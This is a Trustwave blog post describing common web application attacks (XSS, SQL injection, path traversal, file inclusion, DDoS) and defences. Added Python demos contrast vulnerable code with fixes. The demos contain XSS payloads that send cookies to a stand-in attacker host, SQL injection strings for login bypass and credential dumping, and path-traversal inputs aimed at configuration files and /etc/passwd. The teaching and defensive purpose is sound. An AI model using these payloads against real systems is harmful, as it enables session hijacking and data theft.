In an era when so many cyberattacks rely on deluding an unsuspecting person into doing something they shouldn't - from clicking on a link or opening an attachment to agreeing to wire huge sums of money to an impostor - some attack methods still largely keep the user out of the malicious equation. For the bad guys, that means one less impediment in their way.
We're talking about attacks on web applications, easily the most common method of compromise against e-commerce websites -- but really against any company with an internet presence. They don't get quite the same publicity as, for example, ransomware attacks do, but they should: Some of the most publicized data breaches of the last several years were the result of successful attacks against web apps, and those apps were exploitable mostly because of human error or negligence. In fact, a stunning 100 percent of the web apps the Trustwave SpiderLabs team tested in 2017 contained at least one vulnerability. The median number of vulnerabilities detected per application in 2017 was 11, and the largest number found in a single application was 154.
While security professionals are getting better at pushing back against rush-to-market pressures, many organizations are still facing the consequences of insecure web properties seeing the light of day and earning the ire of attackers - especially in the era of cryptocurrency, where adversaries are compromising applications to mine digital coins and pillage exchanges.
Miscreants are also actively targeting content management systems. In recent editions of the Trustwave Global Security Report, we discussed how popular content management systems (CMSes) represent potentially lucrative targets for attackers. When they discover a significant weakness in a widely adopted CMS, it places every installation of that CMS at risk for exploitation, not only before the fix is available but also for considerable time afterward. Attackers use automated tools to find CMS installations to target.
Much has changed across the attack landscape in the past 10 years, with many alterations in the top actors, their motives, toolsets, attack frameworks and targeted exploits. Targeted attacks have become more common and more sophisticated: Many high-profile breach incidents show signs of significant preplanning by attackers who carefully identify weak packages and tools on targeted servers before making a move.
At the same time, the basic web application attack techniques that saboteurs are using tend to be the same ones they've been relying on for years, especially these five (as documented in the 2018 Trustwave Global Security Report):
1. Cross-Site Scripting (XSS)
Involved in about 40 percent of web attack attempts last year, this remains the most common attack technique we see. XSS typically involves inducing a website to serve attacker-supplied script to its other users, usually because the site fails to properly validate user-submitted input and encode it when writing it into a page. If another visitor loads the malicious or compromised web page, their browser executes the attacker's script with the site's privileges - reading session cookies, performing actions as the victim or redirecting the victim to malware. Most XSS attacks are not particularly sophisticated, and we see a lot of attacks come from so-called script kiddies, who are inexperienced attackers using scripts and tools others wrote.
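To make the "fails to encode" point concrete, here is an added example (written for this post; it is not code from the original article or from Trustwave) showing a stored-XSS comment renderer three ways: raw concatenation, a blocklist that strips script tags, and proper HTML encoding. The two payloads and the `executes_script` checker are constructed for the illustration; the checker only looks for a script element or an on* event-handler attribute in the parsed markup.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs (not from the original page): two comments an attacker might post.
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
EVENT_PAYLOAD = '<img src=x onerror="new Image().src=\'http://attacker.example/?c=\'+document.cookie">'


def render_vulnerable(comment: str) -> str:
    """Raw concatenation: whatever the attacker typed becomes live markup for every visitor."""
    return '<div class="comment">' + comment + '</div>'


def render_blocklist(comment: str) -> str:
    """A common half-fix: strip <script> tags. It misses event handlers, javascript: URLs, etc."""
    stripped = re.sub(r'(?i)</?script[^>]*>', '', comment)
    return '<div class="comment">' + stripped + '</div>'


def render_encoded(comment: str) -> str:
    """The actual fix for an HTML element-body context: entity-encode the untrusted value
    so the browser renders it as text. Attribute, JavaScript and URL contexts need
    their own encoders; this one is right only for text between tags."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


class _ScriptFinder(HTMLParser):
    """Flags a <script> element or any on*= attribute in real (parsed) markup."""

    def __init__(self) -> None:
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.found = True


def executes_script(markup: str) -> bool:
    """True if a browser parsing this markup would execute attacker-controlled JavaScript."""
    finder = _ScriptFinder()
    finder.feed(markup)
    finder.close()
    return finder.found


if __name__ == "__main__":
    for name, renderer in [("vulnerable", render_vulnerable),
                           ("blocklist", render_blocklist),
                           ("encoded", render_encoded)]:
        for payload in (SCRIPT_PAYLOAD, EVENT_PAYLOAD):
            print(f"{name:10s} executes script: {executes_script(renderer(payload))}")
```

The blocklist version passes the obvious `<script>` test and fails the `onerror` one, which is why "sanitizing" by pattern is the wrong mental model; encoding for the output context is what removes the bug, and a Content-Security-Policy header is the defence-in-depth layer on top.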
2. SQL Injection (SQLi)
At about 24 percent of web attack attempts, this was the second most common attack technique we witnessed. The most common form of SQLi occurs when an attacker enters SQL syntax into a field on a web page and the server-side code splices that text directly into a database query, rather than binding it as a parameter, so the attacker's input is parsed as part of the query itself. A successful SQLi attack can delete or change sensitive data or reveal it to the attacker.
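The following is an added example (not code from the original article or from Trustwave) of the login-form case described above, run against an in-memory SQLite table. The table contents and the two payloads are constructed for the demonstration; passwords are stored in clear text only to keep the example short, which real code must never do.

```python
import sqlite3

# Constructed sample data (not from the original page).
SEED_USERS = [
    ("alice", "s3cret", "admin"),
    ("bob", "hunter2", "user"),
]

# Two constructed payloads typed into the username field.
AUTH_BYPASS = "' OR '1'='1' --"                          # makes the WHERE clause always true
DUMP_CREDS = "' UNION SELECT username, password FROM users --"  # returns another table's columns


def build_db() -> sqlite3.Connection:
    """Creates the demo users table. Plaintext passwords are for brevity only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)", SEED_USERS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-formatted query: the input becomes part of the SQL grammar.
    With AUTH_BYPASS the query ends up as
    ... WHERE username = '' OR '1'='1' --' AND password = '...'
    and the '--' comments out the password check."""
    query = ("SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchall()


def login_safe(conn, username: str, password: str):
    """Parameterized query: the driver sends the values separately from the statement,
    so a quote or a '--' in the input is just data and can never close the string literal."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, bypass:", login_vulnerable(db, AUTH_BYPASS, "wrong"))
    print("vulnerable, dump:  ", login_vulnerable(db, DUMP_CREDS, "wrong"))
    print("safe, bypass:      ", login_safe(db, AUTH_BYPASS, "wrong"))
    print("safe, real creds:  ", login_safe(db, "alice", "s3cret"))
```

Note that the fix is parameterization, not escaping quotes: the second payload shows the same bug turning a login form into a data-extraction endpoint, and running the application's database account with the least privilege it needs limits how much a remaining injection can reach.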
3. Path Traversal
These web attacks were used in about 7 percent of cases we examined. They attempt to access unauthorized files or directories outside the web root folder by injecting patterns such as "../" into a file path parameter to move up the server's directory hierarchy. Successful path traversal can allow attackers to improperly access site or user credentials, configuration files, databases or other sites co-located on the same physical machine. As with XSS and SQLi, successful path traversal attacks usually result from inadequate validation of user-supplied input, and they often are combined with other attacks, such as local file inclusion, to steal the targeted data or credentials.
4. Local File Inclusion (LFI)
Observed in about 4 percent of attacks, this is where the attacker uses directory traversal or a similar mechanism to induce the web application to include - and, where the application treats the included file as code, execute - a file residing elsewhere on the server, typically by manipulating a parameter that names a template, language file or page to load.
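Since path traversal and local file inclusion share the same root cause, one added example (written for this post; not code from the original article or from Trustwave) covers both: a template include that resolves a user-supplied name under the web root. It contrasts a naive fix that strips "../" once with a check based on `os.path.realpath` and `os.path.commonpath`. The temporary web root, the files in it and the attempted paths are all constructed for the demonstration.

```python
import os
import tempfile


def naive_resolve(root: str, user_path: str) -> str:
    """A common but broken fix: remove '../' and join. '....//' survives as '../',
    and os.path.join() silently discards root when user_path is absolute."""
    cleaned = user_path.replace("../", "")
    return os.path.realpath(os.path.join(root, cleaned))


def resolve_under_root(root: str, user_path: str) -> str:
    """Canonicalise the joined path and refuse anything outside root.
    realpath() collapses '..' and follows symlinks; commonpath() also catches
    absolute inputs, because os.path.join(root, '/etc/passwd') is '/etc/passwd'."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("path escapes web root: %r" % user_path)
    return candidate


def include_template(root: str, name: str) -> str:
    """LFI-hardened include: the file must be under root AND be an allow-listed type."""
    path = resolve_under_root(root, name)
    if not path.endswith(".html"):
        raise ValueError("refusing to include non-template file: %r" % name)
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Builds a throwaway web root next to a sensitive file and tries several inputs
    against both resolvers. Returns {"naive": {...}, "safe": {...}} keyed by input."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "webroot")
    os.makedirs(os.path.join(root, "templates"))
    with open(os.path.join(root, "templates", "home.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>home</h1>")
    with open(os.path.join(base, "config.ini"), "w", encoding="utf-8") as fh:  # OUTSIDE the web root
        fh.write("db_password=hunter2")

    attempts = [
        "templates/home.html",          # legitimate
        "../config.ini",                # classic traversal
        "templates/../../config.ini",   # traversal from a subdirectory
        "....//config.ini",             # bypasses a single replace('../', '')
        "/etc/passwd",                  # absolute path; os.path.join drops root
    ]
    try:  # symlink inside the root pointing outside it; skipped where symlinks are unavailable
        os.symlink(os.path.join(base, "config.ini"), os.path.join(root, "templates", "link.html"))
        attempts.append("templates/link.html")
    except OSError:
        pass

    results = {"naive": {}, "safe": {}}
    root_real = os.path.realpath(root)
    for p in attempts:
        path = naive_resolve(root, p)
        if os.path.commonpath([root_real, path]) != root_real:
            leaked = ""
            if os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    leaked = ": " + fh.read()
            results["naive"][p] = "ESCAPED" + leaked
        elif os.path.isfile(path):
            with open(path, encoding="utf-8") as fh:
                results["naive"][p] = fh.read()
        else:
            results["naive"][p] = "NOT FOUND"
        try:
            results["safe"][p] = include_template(root, p)
        except ValueError:
            results["safe"][p] = "REJECTED"
    return results


if __name__ == "__main__":
    for mode, outcomes in demo().items():
        for attempt, outcome in outcomes.items():
            print(f"{mode:5s} {attempt:30s} -> {outcome}")
```

The naive resolver looks fine on the textbook "../config.ini" input and leaks the configuration file on the "....//" and symlink variants; the canonicalise-then-compare check rejects all of them, and the extension allow-list is what keeps a traversal inside the root from turning into inclusion of a log or upload the attacker controls.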
5. Distributed Denial of Service (DDoS)
These accounted for about 3 percent of attacks we examined. DDoS involves commanding numerous computers, typically compromised computers in a botnet, to bombard a targeted web server with requests, overloading its resources and rendering it unavailable to legitimate visitors. While DDoS alone does not provide an attacker with improper access to any resources, in 2017 we saw a trend of attackers increasingly using DDoS alongside other attacks to distract automated defense systems from responding to an issue.
A Quick Refresher: Three Types of Protections
Aside from ensuring patches are applied according to your priority schedule, here are three steps your business can take to stay defended against web application attacks:
1. Vulnerability Scanning and Security Testing: The power of web applications to connect outside users to data and services easily makes them big targets for attackers. Scanning and testing databases, networks and applications throughout the development lifecycle - from design to development to testing and ongoing maintenance - can offer you a unique perspective on where the vulnerabilities are, how dangerous they are (and for whom) and how to mitigate them. Ultimately your decision on whether to remediate any discovered flaws will depend on your organization's risk appetite, which may factor in the likelihood that a vulnerability will be exploited and that data (and monetary) loss will result.
2. Web Application Firewalls (WAFs): WAFs provide an important line of defense for critical applications and data. Unlike traditional firewalls, which mainly control traffic based on the ports and protocols they use, a WAF controls access to web applications using rules designed to recognize and restrict suspicious activity, such as SQLi, XSS and exploitation of known vulnerabilities. WAFs are updated continuously with new rules designed to catch the latest attack and exploitation techniques before they can harm important resources. They operate at the application layer, the highest level of the OSI model, which means they can inspect the full HTTP request and response - URL, headers, cookies and body - rather than just addresses and ports. This gives them the power to protect websites from a wide range of attacks, although a WAF is a compensating control that buys time to fix the underlying flaw, not a replacement for fixing it.
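To show what "rules designed to recognize suspicious activity" look like in practice, and why such rules need the request normalized first, here is an added example (written for this post; not code from the original article or from any WAF product). The rule patterns, the request samples and the `inspect` function are all constructed for the illustration and are far simpler than a production rule set.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (not real traffic): (method, path-with-query, body).
SAMPLE_REQUESTS = [
    ("GET", "/search?q=shoes", ""),
    ("POST", "/login", "user=admin%27+OR+%271%27%3D%271%27+--&pass=x"),
    ("GET", "/comment?text=%3Cscript%3Edocument.cookie%3C%2Fscript%3E", ""),
    ("GET", "/download?file=..%2F..%2F..%2Fetc%2Fpasswd", ""),
    ("GET", "/download?file=..%252F..%252Fetc%2Fpasswd", ""),   # double URL-encoded
]

# Illustrative signature rules, one per technique discussed in the post.
RULES = [
    ("SQLi", re.compile(r"(?i)['\"]\s*or\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+|union\s+select")),
    ("XSS", re.compile(r"(?i)<\s*script\b|\bon(?:error|load|click|mouseover)\s*=")),
    ("Traversal", re.compile(r"\.\./|\.\.\\")),
]


def normalize(text: str, rounds: int) -> str:
    """URL-decode up to `rounds` times, stopping when the text no longer changes.
    rounds=0 inspects the raw bytes; rounds=1 is what a naive rule engine does;
    a couple of extra passes defeat the double-encoding trick (%252F -> %2F -> /)."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect(method: str, target: str, body: str, rounds: int = 3) -> list:
    """Returns the names of rules that fire for one request after normalization."""
    text = normalize(target + " " + body, rounds)
    return [name for name, pattern in RULES if pattern.search(text)]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req[0]} {req[1]:55s} raw={inspect(*req, rounds=0)} "
              f"once={inspect(*req, rounds=1)} full={inspect(*req)}")
```

Run it and the login and traversal requests are invisible to the raw rules, and the double-encoded traversal slips past a single decode, which is the general shape of WAF evasion: the rule is fine, the view of the request is not. That is also why the rules are a safety net and the parameterized query or path check belongs in the application.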
3. Secure Development Training (SDT): Instruction provides your developers, testers, project managers and architects with the latest secure software development practices, establishing a baseline of security awareness while preparing your staff to design, build and deploy secure software and applications.
Dan Kaplan is manager of online content at Trustwave. Read more Trustwave blogs here.